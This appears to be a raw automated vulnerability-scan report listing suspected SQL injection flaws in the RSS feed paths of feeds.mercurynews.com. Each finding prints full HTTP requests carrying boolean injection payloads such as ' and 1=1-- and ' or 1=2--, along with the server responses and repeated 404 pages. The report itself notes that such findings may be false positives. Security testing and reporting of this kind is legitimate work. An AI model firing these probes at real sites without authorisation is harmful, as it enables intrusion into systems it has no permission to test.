GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200923.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:36 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 48401163'%20or%201%3d1--%20 and 48401163'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet48401163'%20or%201%3d1--%20/568/200924.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:18 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet48401163'%20or%201%3d2--%20/568/200924.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:18 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200925.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:16 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200925.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:16 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200927.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:22 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200927.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:26 GMT Content-Length: 0 Connection: close
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200929.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:32 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200929.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:32 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200930.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:03 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200930.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:22:03 GMT Date: Tue, 07 Dec 2010 23:22:03 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200934.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:22:15 GMT Date: Tue, 07 Dec 2010 23:22:15 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200934.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:16 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 12838428'%20or%201%3d1--%20 and 12838428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi12838428'%20or%201%3d1--%20/rss/CustomRssServlet/568/200935.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:21:57 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi12838428'%20or%201%3d2--%20/rss/CustomRssServlet/568/200935.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:21:57 GMT Date: Tue, 07 Dec 2010 23:21:57 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13599438%20or%201%3d1--%20 and 13599438%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56813599438%20or%201%3d1--%20/200935.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:10 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56813599438%20or%201%3d2--%20/200935.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:10 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200936.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:35 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200936.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:35 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 13962808%20or%201%3d1--%20 and 13962808%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56813962808%20or%201%3d1--%20/200939.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:22:16 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /mngi/rss/CustomRssServlet/56813962808%20or%201%3d2--%20/200939.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:22:16 GMT Content-Length: 0 Connection: close
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11601329'%20or%201%3d1--%20 and 11601329'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
